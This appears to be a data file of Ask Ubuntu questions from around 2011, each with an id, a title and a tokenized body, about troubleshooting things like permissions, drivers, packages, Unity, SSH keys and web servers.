53533	ddclient not working without sudo	when i run ddclient ( dynamicdns updator ) without sudo , i get warning : file /etc/ddclient.conf : can not open file '/etc/ddclient.conf ' . ( permission denied ) stat ( ) on closed filehandle fd at /usr/sbin/ddclient line 934 . use of uninitialized value $ mode in bitwise and ( & ) at /usr/sbin/ddclient line 935. readline ( ) on closed filehandle fd at /usr/sbin/ddclient line 947 . warning : file /etc/ddclient.conf : can not open file '/etc/ddclient.conf ' . ( permission denied ) stat ( ) on closed filehandle fd at /usr/sbin/ddclient line 934 . use of uninitialized value $ mode in bitwise and ( & ) at /usr/sbin/ddclient line 935. readline ( ) on closed filehandle fd at /usr/sbin/ddclient line 947 . warning : file /var/cache/ddclient/ddclient.cache : can not open file '/var/cache/ddclient/ddclient.cache ' . ( permission denied ) stat ( ) on closed filehandle fd at /usr/sbin/ddclient line 934 . use of uninitialized value $ mode in bitwise and ( & ) at /usr/sbin/ddclient line 935. readline ( ) on closed filehandle fd at /usr/sbin/ddclient line 947 . however it works fine with sudo . do i need to chmod some files ? if yes , please explain how .
53537	how to synchronize hamster-tracker with ubuntu one	i 'm using hamster-tracker on different machines , so , i want to share my data across these . how can i achieve , that hamster is using one single database , which is synced via ubuntu one ?
53539	how to cleanly remove a badly installed .deb ?	whenever i try to use dpkg or apt-get , i get the warning : dpkg : warning : parsing file '/var/lib/dpkg/available ' near line 12674 package 'jarnal ' : error in version string 'build901 ' : version number does not start with digit looking at the /var/lib/dpkg/available file , i find the entry package : jarnal priority : optional section : non-free maintainer : david k. levine < david @ dklevine.com > architecture : all version : build901 depends : sun-java5-jre | sun-java6-jre recommends : sun-jai , sun-jai-imageio size : 11217466 description : a java notetaker and pdf annotator ... < snip > which corresponds to the /debian/control file in jarnal-build918_all.deb . i installed this package about a year ago ( before upgrading to 11.04 ) , but can not remove it using apt or dpkg or various frontends . locate find files installed in /usr/lib/jarnal/ , but it looks incomplete - i think it might be a failed uninstall - since i remember playing with it once , so it must have been properly installed at some point . anyway , how can i cleanly remove both the files and the data stored by apt/dpkg from my system ?
53553	how do i retrieve the public key from a ssh private key ?	a ssh private key as generated by ssh-keygen contains a public key part . how do i retrieve this public key from the private key ? i 've lost my public key and need to put the contents of this public key in the servers authorized_keys file and do not want to create a new key pair . alternatively phrased : how do i create the id_rsa.pub file from a id_rsa file ?
53556	strange characters appearing when i use the ctrl and arrow keys to navigate	when i type control and any of the arrow keys in any terminal ( gnome-terminal , as well as terminator ) , i get this ( or something like it ) . it happens when i use openbox as well , so it 's not a compiz issue . and it 's only in terminal programs , never in a gui app ( such as firefox , chrom ( ium ) e , or empathy ) .
53560	ubuntu 11.04 mouse error	i have installed ubuntu 11.04 ( win7 dual-boot ) today , so i am a newbie in the world of ubuntu . i like it , because it is very new and interesting to me , but there is a thing , that really annoys me . when i have a window open , it is usually okay to use the mouse , but if i open a new window ( like firefox ) then i ca n't use the mouse on the 2nd window . i ca n't click on anything , but i can use the keyboard to navigate with the arrows , but it is really hard to me , because i ca n't use 2 windows at one time . please reply as soon as possible .
53561	create live cd / remastersys	how can i create live cd / backup cd which can be use to install on another computer . i have tried to do this with remastersys and ubuntu 11.04 . remastersys was works fine in ubuntu 10.04 but not works on 11.04 . this will create the live cd / backup cd , boot from it and install properly but at the end , during installation of grub it gives an error , grub can not be install on /dev/sdax if we give any of our drive partition will not works and i have to either quit without installation of grub or cancel the installation . also tried to install grub manually but ca n't success please help ...
53563	authentication at cups web interface	when i try to perform any administrative task on cups web interface i get pop-up window that requires me to authenticate at cups . authenticating both as root and as a my user fail , even though my user is added to the lpadmin group as described in : cups print server guide any idea what can be wrong or how i debug it ?
53564	is there a way to encrypt a file using seahorse without installing the `` seahorse-plugins '' package ?	seahorse came preinstalled on my default installation of ubuntu . but i can find no way to encrypt a file using it . i am wanting to use a gui i do n't want to do it using the terminal . creating the private key and signing public keys can all be done in seahorse gui . is there a way to also encrypt files using this interface , or do i need to install the seahorse-plugins package to have a gui method of encrypting ?
53565	white text on yellow background in popup elements with ambiance theme	in eric4 , when i select the `` what 's this '' tool and then click on something to get a pop-up explanation , the resulting text appears white on yellow ( unreadable ) . the tool-tips are fine ( white on black ) . if i change the theme to any other , the text is black on yellow . i 've found some posts on the internet about such behaviour with skype and libreoffice , but it does n't seem to me to be the program-specific problem since it appears in various apps . how can i tune it ?
53567	unity freezing ( new install )	i just installed ubuntu 11.04 and after logging in for the first time , i enabled the restricted driver for my nvidia 7300 le card and enabled the same . after rebooting , the system freezes ( unresponsive ) . so i rebooted the system and used the safe mode.. is my graphics card ( nvidia 7300 ) enough for unity ? , if its enough , please guide me how to get it working .. thanks !
53578	can i install in uefi mode with the alternate installer ?	i 'm wondering if it 's possible to install ubuntu 11.04 uefi mode with the alternate installer . i 've read that only grub-efi is needed to boot in uefi mode . how do i install that ?
53581	my passport essential external usb 3.0 drive runs at usb 2.0 speed	0 wd my passport drive plugged into a ( blue ) usb 3.0 port . i mount it and it transfers at about 14mbyte/sec . under windows 7 ( i have dual boot ) it transfers at about 120 to 230 mbyte/sec on the same port . lsusb listing is : bus 008 device 004 : id 1058:0730 western digital technologies , inc . bus 008 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 004 : id 03f0:0024 hewlett-packard ku-0316 keyboard bus 004 device 003 : id 0458:0007 kye systems corp. ( mouse systems ) bus 004 device 002 : id 046d:08b2 logitech , inc. quickcam pro 4000 bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub i am using the correct port and there is no fault with the drive . all works correctly under windows 7 . i am using ubuntu 11.04 64 bit natty with all the updates . dmesg gives : 2510.028644 ] sd 10:0:0:0 : [ sdb ] assuming drive cache : write through [ 2510.028656 ] sd 10:0:0:0 : [ sdb ] attached scsi disk [ 2510.152518 ] xhci_hcd 0000:03:00.0 : warn : stalled endpoint [ 2578.450633 ] xhci_hcd 0000:03:00.0 : warn : short transfer on control ep [ 2578.450992 ] xhci_hcd 0000:03:00.0 : warn : short transfer on control ep [ 2578.451364 ] xhci_hcd 0000:03:00.0 : warn : short transfer on control ep [ 2578.451744 ] xhci_hcd 0000:03:00.0 : warn : short transfer on control ep [ 2578.452119 ] xhci_hcd 0000:03:00.0 : warn : short transfer on control ep [ 2578.452490 ] xhci_hcd 0000:03:00.0 : warn : short transfer on control ep [ 2578.453739 ] xhci_hcd 0000:03:00.0 : warn : stalled endpoint any help would be appreciated .
53582	how do i know what ubuntu ami to launch on ec2 ?	when i want to launch an instance of ubuntu on ec2 , how do i find the right one ? there are thousands of public images that have `` ubuntu '' in their name . i am only interested in running the official ubuntu images . how do i now which ami is the right one ?
53589	gnome 3 on 11.04 : does n't work . how to troubleshoot ?	i installed gnome 3 on natty , using the ppa and these instructions . i restarted and tried to log in using gnome , only to be greeted by a oh no ! something has gone wrong . a problem has occurred and the system ca n't recover . please log out and try again . log out it does n't give any other details . where can i access the log or know more about the error or how do i fix the problem ? specs : aspire one zg5 ubuntu 11.04 update : i tried this from the instructions here cd ~/.config/autostart nano gnome-shell.desktop then , in the editor , type this : code : [ desktop entry ] type=application exec=gnome-shell -- replace hidden=false nodisplay=false x-gnome-autostart-enabled=true name [ en_us ] =gnome shell name=gnome shell comment [ en_us ] = comment= when i rebooted into gnome , i did not get the error but i did not get anything else either . even unity and unity 2d failed to load . so , i re-edited gnome-shell.desktop and removed all text . now when i log in to gnome , i get the wallpaper and nothing else . i can log in to unity and unity 2d though . also , i have a problem with running software-sources-gtk on the same system . is it related ? how do i change my video drivers to open source ones ? i did not install any drivers while installing ubuntu , so the drivers are provided by ubuntu . video driver : 00:02.0 vga compatible controller : intel corporation mobile 945gme express integrated graphics controller ( rev 03 ) after updating to gnome 3 , my system settings folder has changed . i do not have a hardware drivers option now . how do i update / change my video drivers ?
53599	memory cache still load , after close programs	it 's show on system indicator , i found solution in ubuntuforum to use command sudo echo 3 | sudo tee /proc/sys/vm/drop_caches it 's work , but why my ubuntu not handle by itself ?
53604	how can i prevent eyestrain ?	i can use a windows machine for 10 hours straight without the slightest problem , but after around 15-30 minutes of using ubuntu my eyes become sore and dried out . i currently have 11.04 installed with a dual-boot windows xp . same hardware , eyestrain only with ubuntu . i 've also tried different versions of ubuntu on two different machines . same eyestrain problem . i 've tried combinations of fonts and font rendering and installed the microsoft fonts , although i 'm not sure it is related to the fonts anyway because i think the fonts look quite nice . xrandr shows the monitor refresh rate set at 60hz ( the only option for my laptop lcd ) . is there anything else i can try ? i 'd like to use ubuntu , not windows ...
53605	proper method of creating daily-building ppas	is there a proper method that works to create a daily automatic build of a ppa in launchpad ? if so , what is the proper methodology ?
53613	ca n't get updatemanger to update vlc	i 'm running ubuntu 10.10 maverick and trying to update vlc from the new ppa ppa : ferramroberto/vlc . update manger just says other updates ( lp-ppa-ferrnroberto-vlc ) then shows libirary for encoding/decoding of dirac video streams libschroedinger-1.0-0 ( size : 254kb ) . but does n't let me check mark it to update it . i have the following settings checked marked important security upadtes , reconmended updates , check for updates daily , only notify about avalible updats , and release upgrades set to normal .
53616	how do i install minecraft ?	i 've been searching everything that could possibly help , but nothing has worked , and i 'm really getting annoyed , because minecraft lags like no tomorrow on windows . can anyone please help me install minecraft on ubuntu 10.04 ?
53618	do the brcm80211 drivers need patching to work correctly in airmon etc ?	i am trying to use the broadcom brcm80211 drivers along with a bcm4313 chip and aircrack-ng suite of programs but airodump only ever lists clients for wep protected access points . i have setup a wpa2 router and connected another device to it so i know there is definately a client but i never pick it up . can anyone offer any advice ? sadly there is alot of junk relating to getting this chipset functioning even in a basic way with linux so if you google it you will get hits relating to propietary drivers , b43 legacy and also kernel source which is what currently is in use . the drivers function fantastic in normal operation . monitor mode obviously works , i 'm not certain about the injection , some things hint at it working and others point to it failing . network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) update : the kernel driver still needs more development to work for penetration testing purposes but the responsiveness for regular wifi use is far superior to the wl or sta drivers .
53622	play audio that are embedded in pdf file	i have a pdf file that has audio embedded in it . in windows the audio is played when i click the link after opening the pdf file in adobe reader . i opened the same file in adobe in ubuntu , however am unable to play them , after clicking on the audio link , a dialog box pops up saying you need a media player to play the file , after clicking the allow tab on the dialog box , it takes me to this page . please assist , how can i play those embedded audio file in ubuntu ?
53623	synaptic mousepad not working !	when i first installed ubuntu my mousepad did n't have double touch . this was annoying and i found a thread that gave me some code . now i ca n't scroll with my touchpad and it seems like it just turned it into a ps/2 mouse in a touchpad . when i try to use synclient it says ca n't find synaptics properties . no driver loaded ?
53625	wireless on thinkpad edge e420s	i have installed kubuntu 11.04 ( natty ) on my thinkpad edge e420 laptop . unfortunately , the wireless is not working . i have got windows 7 installed besides kubuntu , and wireless is working with no problems there , so it has to be problem of the os . what i tried : i installed the official driver from realtek rlt8192ce . after reboot the wireless did n't work , but at least the system was able to detect that it is present in the system . however , after executing lscpi -v , under the card 's details there was a line `` currently used driver '' which said `` r8169 '' . why is this ? i did all of this according to a manual on http : //www.php-architect.com/blog/2010/05/01/getting-wireless-to-work-on-lenovo-thinkpad-t400-with-ubuntu-10-4-lucid/ . there a meany other similar ones , but do n't work for me either . my questions are : 1 ) is there any way to get this fixed ? if yes , how to do so ? 2 ) do you think opensuse ( or any other distro ) is better distribution concerning such hardware issues , so should i give it a try ? if yes , which distro gives me the best chance ?
53626	is there any way to `` scrobble '' to libre.fm using banshee ?	well , is there any way to `` scrobble '' to libre.fm using banshee ? ( i 'm on banshee 2.1 ) i found out that rhythmbox can do it , but i prefer banshee .
53631	how to organize a block of text in 8-character lines ?	i 'm toying around with binary code and ciphers and i 've a chunk of text which i would like to reorganise in 8-character lines ( those familiar with the topic will understand why ) . see : 010000100110010100100000011100110111010101110010011001 010010000001110100011011110010000001100100011100100110 100101101110011010110010000001111001011011110111010101 110010001000000100111101110110011000010110110001110100 01101001011011100110010100101110 i 'm sure i must use cut , split , grep , sort or maybe a combination of these ( and/or others ) , and i 've made some tries with all these , but without any success . i could easily do this manually , but this 's what computers were made for , back in the world war ii days : )
53638	can i use nginx and gnutls together ?	i read that nginx works with openssl . but since gnutls is the only software that provides tls 1.2 support , it would be useful to combine that . so , how can i compile nginx with gnutls on ubuntu ? = )
53639	firefox scrolling is extremely slow , flash sometimes causes system crash	i 've had this problem for some time and it 's driving me insane . what happens is that firefox 5 will scroll really slow and sometimes even lag jump down the scrollbar . on top of that sometimes the sites will just lag while loading or scrolling in general . i 've tried all sorts of setups to get this to work right . i just do n't know what to do anymore . i 'm getting to the point where i just may switch back to windows ( which i really really do n't want to do ) . i originally thought it was a situation with flash but it does n't seem to be the case . therefore , there must be something else that is causing this . this site in particular causes massive lag on my end with scrolling : https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/550625 ? comments=all i have a feeling the problem with the scrolling has to be the nvidia proprietary driver . the reason i say this is because it works fine when using a live cd or when the system is on the nouveau driver . i 've tried disabling hardware acceleration , messing with compiz , reinstalling flash , and several other methods described on the web ( lets just say i 've been researching and at this problem for weeks ) . i 've finally given up and i 'm going to ask for help . hopefully i get an answer here or elsewhere to this problem . : ) the scrolling problem may be tied to the fact that , sometimes randomly it will cause my system to halt ( freeze ) completely and i have to restart the system . the mouse is frozen and the system is unresponsive . again , i have a feeling it has to do with the nvidia drivers . i want to point out that chrome scrolls perfectly and has no issues ( though i do n't particularly like chrome and i should n't have to be forced to use it . ) the system did flip out once with flash on chrome but not sure if that was just a random incident . i 'm desperate for a fix for this as i 'm a recent convert to linux . i absolutely love the system and i find it fun to use . though this slight situation with something as simple as a browser is cutting into my patience . here is a link to my system specs ( well not all of it obviously ) : http : //xruptor.tripod.com/ ubuntu 11.04 ( 64-bit ) , nvidia driver ( 275.19 )
53640	is there any open source software to make a online streaming radio ?	i 'm traying to make an online radio in my home . i 've been reading and found that i need a streaming software . i 'm currently running ubuntu 10.10 . any software you know ? thanks a lot !
53645	install screen does n't show on ubuntu livecd/liveusb	i got a new pc about a year ago and back then i tried to install ubuntu beside windows 7 . i used my 3 month ( back then ) old cd i used to successfully install on my old computer beside of windows xp . however in this computer , the cd itself boots fine and i can see the background and cursor . but the install screen does not show . it seems to freeze there . same thing with usb driver . well i recently started doing some tiny game developing and thought to port my game to linux too . but now after getting the most recent iso and mounting it on usb drive , same thing . background and cursor but that 's it . my computer is a fujitsu esprimo mobile v6555 and specs are enough for ubuntu .
53646	how do i make firefox start always maximized ?	i am setting up ubuntu with gnome for my grandma . how can i make firefox start always maximized .
53648	ca n't play steel storm , burning retribution	i 've bougth steel storm , burning retribution in the software center , and every time i run it shows the following message : you have reached this menu due to missing or unlocable content/data you may consider adding -base dir /path/to/game to your launch commandline i 've gone to main menu in the preferences tab and changed the launcher to no avail . i 've tried running it from console , with /opt/steelstorm-episode2/steelstorm , i got : game is steel-storm using base gamedir gamedata steel-storm linux 01:07:07 jun 11 2011 - release playing shareware version . skeletal animation uses sse code path dpsoftrast available ( sse2 instructions detected ) failed to init sdl joystick subsystem : could n't exec quake.rc could n't exec default.cfg execing config.cfg could n't exec autoexec.cfg client using an automatically assigned port client opened a socket on address 0.0.0.0:0 client opened a socket on address [ 0:0:0:0:0:0:0:0 ] :0 linked against sdl version 1.2.12 using sdl library version 1.2.14 gl_vendor : nvidia corporation gl_renderer : geforce 6150se nforce 430/pci/sse2/3dnow ! gl_version : 2.1.2 nvidia 270.41.06 vid.support.arb_multisample 1 vid.mode.samples 0 vid.support.gl20shaders 1 video mode : fullscreen 640x480x32x0.00hz s_startup : initializing sound output format : 48000hz , 16 bit , 2 channels ... wanted audio specification : channels : 2 format : 0x8010 frequency : 48000 samples : 2048 obtained audio specification : channels : 2 format : 0x8010 frequency : 48000 samples : 1024 sound format : 48000hz , 2 channels , 16 bits per sample cdaudio_init : no cd in player . ca n't get initial cd volume cd audio initialized if i try -base /opt/steelstorm-episode2/steelstorm says `` command not found '' .
53652	sound in vlc is out of sync	after a minute or so all my sounds in different videos and formats gets late . i 've tried to reinstall vlc but it did n't help . please help i ca n't play any videos because of that . it 's late about 1-2 seconds . all of the videos work perfectly in movie player !
53654	ubuntu one files , deleting pictures from pc should remove them from phones gallery	when im using the ubuntu one android phone app for files which will automatically upload my pictures taken to the cloud and then to my desktop , if i delete them from my desktop then they should be removed from the phones gallery
53655	what 's a good way to reinstall ( from the command line ) ?	after having these issues : how do i fix broken installation ? ... i 've decided to reinstall ubuntu ( 11.04 ) . i need to do so from the command line . and , while i am reinstalling to clean up and solve some general , confusing problems , i 'd still prefer to keep preferences like keyboard shortcuts if possible . is there some magic wand to reinstall like there was with upgrading from 10.10 to 11.04 ? if i have to back things up on my own , what 's a good way to do so from the command line ? are there any other tips you might give me based on the problem i described in the above thread ? finally , do keep in mind that ubuntu is one of multiple partitions on my machine . i suppose the main question here is , what is the easiest way to reinstall from the command line ? i obviously have my own particular sub-questions here , but , for the sake of the community , a generalized answer will , at least , earn you an up vote from me . i suppose the ideal answer would have one big line with the simple command at the top , and details for my situation somewhere under that .
53656	finding all 11.04 compatible printers ?	openprinting.org is a great resource and service . but using it can be cumbersome . it 's great for checking the compatibility of certain printers , but doing the reverse is tedious . is there a way to list all printers that come up compatible with a certain os ( like ubuntu 11.04 for example ) ? or is there a different site that might offer this kind of feature ?
53659	can i have my cyberglove p5 working ?	i have recently got this cool device : however , i ca n't find -any- information on it and ubuntu together , so i was wondering if any of you have any experience with this . i do n't know anything about it , i can tell you it has 5 sticks for the fingers , a strap to strap around your hand and for buttons . the glove itself is connected to the `` tower '' through a mouse-socket , and the tower is connected to the laptop through usb . my brother thinks `` i '' might need to create my own driver for it in order to have it working , but im a noob on a higher level , so i do n't know how to do that at all .
53660	python 3.2 installation using ucs-4 environment	i building applications using qt4 to develop the ui and python 3.2 os ubuntu 10.04 python 3.2 is installed but fails the following from pyqt4.qtgui import * traceback ( most recent call last ) : file `` < pyshell # 0 > '' , line 1 , in < module > from pyqt4.qtgui import * importerror : /usr/local/lib/python3.2/site-packages/pyqt4/qtcore.so : undefined symbol : pyunicodeucs4_aslatin1string i 've attempted to install python to use ucs-4 but have not been able to do so . python 2.6 on the machine performs without a problem import objects/modules from qt4 . how do i go about configuring python 3.2 to work in ucs-4 environment ?
53662	how do i autohide the top panel in unity ?	when windows are not maximized , the top panel is basically wasted space for me in unity . is there a way to make it autohide ? i.e . make it appear on mouse over .
53665	t61 thinkpad , ubuntu 10.04.2 , fixed address , no connection	i have ubuntu 10.04 installed on my desktop computer which has a device with a fixed address connected to a gigabit port which has a fixed address assigned to it . they happily communicate . now i am trying to get the same application running on a thinkpad t61 with the same device . i have ubuntu 10.04.2 loaded on the t61 . the ethernet port on the t61 communicates nicely with a router using dhcp . however , when i try assigning a fixed address the ethernet interface becomes inactive . i have tried editing the file /etc/network/interfaces to include appropriate information for having eth0 have a fixed address . that does n't work . i am looking for some fresh ideas .
53666	ubuntu one did not download both copies of deluxe album purchased from music store	i bought the deluxe version of biffy clyro - revolutions/live at wembley ( deluxe flac version ) . this version has every song in mp3 and and the 24 bit studio master flac version . only the mp3 versions were transferred to ubuntu one . i bought and paid for the deluxe version ; i should get both file types . how do i manually download these files either through ubuntu one or 7 digital ?
53667	fixing display issues on intel 82845gl	i have opened up this question on launchpad too , but in the interest of getting a bigger response base i am posting it here , hoping someone will pick it up . natty does n't behave very well with the intel 82845gl chipset . i booted my old machine with natty today to test drive it . the specs are : processor : celeron 2.4ghz video : intel 845gl ram : 1gb the first problem is that the display is borked ! what do i mean ? well , see for yourself : if that gets fixed ( and it did for a while but is back now ) , unity is disabled . i think these issues are owed to hardware acceleration being disabled ... or in other words not the right driver for my hardware . a google search on 'intel 82845gl ubuntu ' does return other users having similar problems in the past but i have n't been able to pick out a solution in the many many discussions on the subject- partly owed to my 'linux naivety ' i guess ... but maybe you can help ?
53670	sorting unity 3d search results	when i hit the `` windows key '' and search for an application , the order is always incorrect ( imo ) . as a very simple example , i 'll search for `` calc '' . the default ubuntu calculator is 3rd from the left ( next to the calc widget and libre office calc ) . i noticed this the first time and assumed the order would adjust upon usage . not so . i never use the calc widget and only rarely use libre office calc , but i use gcalctool ( ubuntu 's `` calculator '' ) almost every day . but it still comes up 3rd every time . is there any way to sort these results according to usage ?
53674	how do i get started setting up a small office / home office ?	this is my first post at here . i have been using ubuntu for 3-4 years . however , i have been the only ubuntu users among my physical circles ( i get to know a lot of other users online ) . recently , i have been able to convert my girlfriend to use ubuntu as well and she loves it a lot . i have been thinking of setting up my own small home office . i would have 2 laptops ( 1 of mine , 1 of my girlfriend 's ) and a small server ( just converted from a desktop ) . i also have a wireless router modem which will connect with the laptops through wireless and connect with the server through cable . i am thinking on the best solution to solve this setup . basically , what i want to achieve would be : a network which will allow internal file sharing . a server which can be accessed from the internet ( out of my home ) . so , any suggestion ?
53677	give apache permission to write to /home/*/www/ directories	lamp server newbie here : i have a web server ( on a vps that i have full root access to ) , in which i 'm setting up a few users with websites for . i have apache2 and php set up , and i have manually specified a few sites for them under the /etc/apache2/sites-enables directory ( symlinking them from sites-available , as per normal ) . i do n't actually use the /var/www/ directory , instead opting for the following sort of set up : /home/user1/www/websiteone.com/ /home/user1/www/subdomain.websiteone.com/ /home/user1/www/differentwebsiteone.com/ /home/user2/www/websitetwo.com/ /home/user3/www/websitethree.com/ etc , etc , etc . i hope you can see where i 'm getting at . i have two issues though : apache can not write to these directories . is there a simple , clear explanation on how i can achieve this for all /home/*/www/ directories only ( and recursively ) to be writable by www-data , without giving user1 write access to user2 and so on ? a simple step that retroactively works on all future users is preferred , but i do n't mind manually setting it up should it be impossible . secondly : in some cases , i would like , say , user2 to have access to the differentwebsiteone.com files ( in user1 's home directory ) , but not give them access to anything else ( so , some sort of symlink appears as /home/user2/www/differentwebsiteone.com ) . can i achieve this easily ? maybe moving the site files to /var/www/ and symlinking to their respective home directories ? or something ? advice is much appreciated ! thanks !
53679	what differences do i need to know choosing between ext4 and ntfs ( performance etc )	i understand that ext4 if faster than ntfs . but whats the speed difference if its like < 20mb/s , perhaps its better to use ntfs for convinence ? what are the other implications of this apart from performance ?
53680	php mail function and sendmail	i 'm trying to get the php mail ( ) function to work . but it fails to send emails . i run ubuntu 11.04 . i installed sendmail . i opened the php.ini and set ; for unix only . you may supply arguments as well ( default : `` sendmail -t -i '' ) . ; http : //php.net/sendmail-path sendmail_path = /usr/sbin/sendmail -t sendmail_from = no-reply @ mydomain.com then i restarted apache . then created a simple php script to test it but no luck . when i try to run sendmail it gives me a permissions error , so i have to run 'sudo sendmail ' . does my mail system failure have anything to do with permissions ? is there further configuration i need to do with sendmail ? thanks . edit : the error is this : user @ server : ~ $ sendmail command 'sendmail ' is available in '/usr/sbin/sendmail' the command could not be located because '/usr/sbin/ ' is not included in the path environment variable . this is most likely caused by the lack of administrative privileges associated with your user account . sendmail : command not found user @ server : ~ $ sudo sendmail sendmail : no recipients supplied - mail will not be sent
53682	how do i get a huijia gamepad working ?	i have a usb n64 controller adapter and i do n't know how to calibrate it . i ran jscal and everything but the joystick portion still only registers half way . and when i do try to calibrate it , it thinks it has 12 axises !
53686	alternative to grub	on my nettop ( nvidia ion ) grub takes ~2 min to load ( https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/443113 ) . can i use some alternative bootloader to work around this issue ? how to set it up ?
53688	making ctrl+c copy text in gnome-terminal ?	is it possible for me to make ctrl+c perform a copy command if there is highlighted text in the terminal ? otherwise , it should retain its normal behavior . ( if there is a terminal that can do this other than gnome-terminal , that 's probably fine too . )
53694	installing programs from the bash script	i wish to install a large number of programs from the software center on all my 8 machines . installing each program individually would be time consuming so i decided to write a bash script for installing all these programs in 1 go . it looks something like this - # ! /bin/sh apt-get install xyz1 apt-get install xyz2 apt-get install xyz3 ( am running this script as a super user ) now the problem is that for almost every installation it asks me ..need to get 123 kb of archives . continue [ y/n ] ? every time i have to select y ( yes ) myself . is there some way in which i can override this confirming mechanism so that i do n't have to press y everytime ?
53699	disk partitioning	i have done a few linux installation previously . so far , i think this disk partition scheme works the best for me . / – 10gb swap – 2 x ram size /home – rest this is great for me while distro hopping . i can wipe the / partition easily and re-use the /home partition . so what is your favourite disk partition scheme ? anyone using lvm ( logicial volume manager ) in ubuntu ? just want to collect more ideas for reference in future .
53700	permissions being reset when server restarted	hi i am using wordpress on my vps , i 've given permissions to my user to the public_html folder so automatic updates and the like can work , but every time i need to restart the server it seems the permissions are gone and i have to give my user ownership once again . why is this happening ?
53702	grub prompt after upgrade to 11.04	i realize that there are a lot of information on here/google about this , but i think my problem is different . i upgraded 9.10 - > 10.04 - > 10.10 - > 11.04 . 11.04 failed and i was stuck at the grub prompt . as you can see in the photo , i 'm having a hard time loading anything from the disk . i have three disks , /dev/sdc being the os disk on which i have ubuntu server . this is a pure ubuntu box . please help : ' (
53704	how does mutter differ to compiz in terms of its resource consumption ?	i was using gnome-shell and i forgot i was n't using compiz . i did n't pay all that much attention to my battery life as i think i was plugged in . has anyone taken notice of the resource consumption of the two rendering methods ?
53708	how to create debuginfo package ?	i have created rpm packages for a software along with debuginfo . for ubuntu/debian , i have only the software packaged as .deb but do n't know how to create debuginfo .deb package . please let me know how to create them .
53711	how to define an environment variable systemwide with /etc/environment ?	i am trying to set an environment variable system wide . following the ubuntu site recommendations , i set it up to my /etc/environment file . the thing is when i log out and log in again , i have to source it if i want my environment variable to be set . what am i missing ? thank you , content : myvar= '' /home/user/mypath ''
53712	locate , updatedb & cron	on a new ec2 lucid ami , i 've tried : $ locate include_prompt.sh and got : locate : can not stat ( ) `/var/lib/mlocate/mlocate.db ' : no such file or directory i 've created the locate database using updatedb , and it works fine . do i need to put updatedb in some cron file ? is it invoked automatically ? if not , what would be a reasonable interval ?
53713	why does nothing happen when i click `` shutdown '' from the `` shutdown ... '' dialog ?	i 've been through all questions with the 'shutdown ' tag on this site - but this is different . i choose `` shutdown ... '' from the session menu . i then click `` shutdown '' on the dialog that appears . sometimes this does give me a shutdown and sometimes nothing happens and i am left with my desktop - which still works fine ( that is , i can continue working on my computer if i want ) . typing `` sudo halt '' from a terminal always works . i 'd like to have shutdown work every time . can anyone help ?
53716	where the configuration file of unity launcher is located ?	where the configuration file of unity launcher is located ? settings which are available through dconf-editor . ( desktop- > unity- > launcher ) . sorry for my english : )
53719	alt key codes on ubuntu 10.04 does n't work	when you press alt + number it does n't print symbol , for example alt + 33 on windows would give exclamation mark ( ! ) but it do n't work on ubuntu . is it possible to enable it ?
53729	resizing my /home partition	i have 320 gb hard drive which is partitioned as follows : / is 16 gb , and is reiserfs /home is 300 gb , and is reiserfs swap is 4 gb now i want to install windows and have a dual-boot system , but i do n't have a free partition . i have more than enough free space on the /home partition , though , and i 've heard about tools like resize_reiserfs , so my question is , can i shrink that partition to 280 gb and create a new 20 gb partition on which to install windows , and what is the best way to do it ?
53730	select which network used for internet access	i have got two active network connections on my system : mobile broadband , dhcp to connect to internet via my isp ethernet static ip for local subnet in home network whenever the ethernet connection is active , i lose my internet connection . ubuntu seems to be prefering the ethernet port for internet access ... how can i setup my system to always use the mobile broadband for web access ? thanks for any help .
53731	/proc/kcore very big	i am running ubuntu 11.04 and i ran a very ram intensive program . when i try to log in after reboot , i receive an error message : the configuration defaults for gnome power management have not been installed correctly and i can not log in , except as root . when i log as root i get the message : file system root has only 0 bytes disk space remaining . /dev/sda1 48256340 48015552 0 100 % / none 12359144 716 12358428 1 % /dev none 12366864 24 12366840 1 % /dev/shm none 12366864 356 12366508 1 % /var/run none 12366864 0 12366864 0 % /var/lock /dev/sda6 890105868 215415664 629475384 26 % /home the culprit seems to be /proc/kcore with a size of 128tb ( my hd is 100tb with 24gb ram ) . i understand that this file is a virtual file and contains the ram the kernel can allocate and that i can not delete it . do you have idea on how to solve this problem ? many thanks !
53738	ca n't get to bash in 9.10 server vm , zombie process and hung tomcat	i have a simple 9.10 ubuntu server hosted in virtualbox on a windows 7 machine . overview of issues tomcat crashes something about a zombie process ca n't get to the shell this vm 's been runing fine for almost a year , as have two other vms that are nearly identical to it . recently the physical disk ran out of space , but i feel this is unrelated . on boot : fsck from util-linux-ng 2.16 /dev/sda1 : clean , 142228/2514944 files , 759405/10042625 blocks [ 3.001120 ] piix4_xmbus 0000:00:07.0 : smbus base address uninitalized - upgrade bios or use force_addr=0xaddr i do n't believe these are directly related to my issue however . it proceeds to start various daemons , and reaches tomcat , where it times out entirely . * starting tomcat serverlet engine tomcat6 ... ... ... normally , it would throw warning about tomcat not having started correctly , and crashing after 120 seconds , for some reason , it did n't do it this time . the system then gets to a login prompt , where i can log in successfully with my username/password combination . it shows all the standard `` welcome '' information , and also previously displayed a message about a zombie process , but now i ca n't replicate that after hard rebooting the vm . then the terminal acts like it died on me , and i ca n't reach the $ shell to type something . all my keys can be used , it just does n't take anything to the shell . if i slam ctrl+c a few times , it logs me out back to the authentication screen , but nothing past that . if i wait long enough : [ 480.450049 ] info : task cron:1256 blocked for more than 120 seconds . [ 480.450798 ] `` echo 0 > /proc/sys/kernel/hung_task_timeout_secs '' disables this message okay , remember here , i ca n't get to the shell . so i 've got no idea what to do . this is basically what i 'm looking at : you can see where i 'm slamming on enter out of frustration . update okay , so it looks like all those times i slammed on enter , shell showed up all at once after another message about something being blocked , so it looks like bash is just really laggy ? i 'm not sure . also , the apache httpd seems to send data , again , just sending the response back after a considerable delay . update2 i was unable to ssh or otherwise into the server , due to the response delay . after several of these task cron blocked messages came through , i am now able to use console , but ssh will not let me in . the delay in apache seems to have 